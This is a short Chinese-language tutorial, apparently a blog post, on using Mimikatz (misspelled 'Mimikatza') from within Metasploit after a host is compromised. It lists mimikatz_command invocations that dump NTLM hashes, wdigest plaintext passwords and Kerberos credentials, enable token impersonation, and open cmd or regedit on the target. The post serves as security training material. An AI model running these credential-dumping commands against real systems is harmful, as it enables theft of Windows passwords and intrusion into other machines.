Mimikatza介绍
Mimikatza是一款后渗透测试工具。它能够从Windows认证的进程中获取内存,并且获取明文密码和NTLM哈希值的工具。这个工具已被集成到MSF框架上,它允许方便地访问它一系列的特性,而不需要上传任何文件到目标机器上。有关NTLM的相关知识可参考以下文章:
https://blog.csdn.net/qq_26886929/article/details/53905654
相关命令及作用
首先我们先在msf中导入mimikatza这个模块
msv:导出hash和认证信息
wdigest:获取本地用户信息及密码
kerberos:导出kerberos认证信息
mimikatz_command -f a:::随便输入一个模块a::查看帮助信息
mimikatz_command -f samdump::hashes:查看用户的ID号和对应的hash值
mimikatz_command -f process::list:查看对应主机开启了哪些进程
mimikatz_command -f service::list:查看该主机上开了哪些服务
mimikatz_command -f handle::list:也是查看相应的进程,不过handle能进行令牌假冒
mimikatz_command -f nogpo::cmd:在对应主机上开启一个cmd窗口
mimikatz_command -f nogpo::regedit:在对应主机上开启注册表
mimikatz_command -f minesweeper::infos:在win7上玩扫雷,破解透视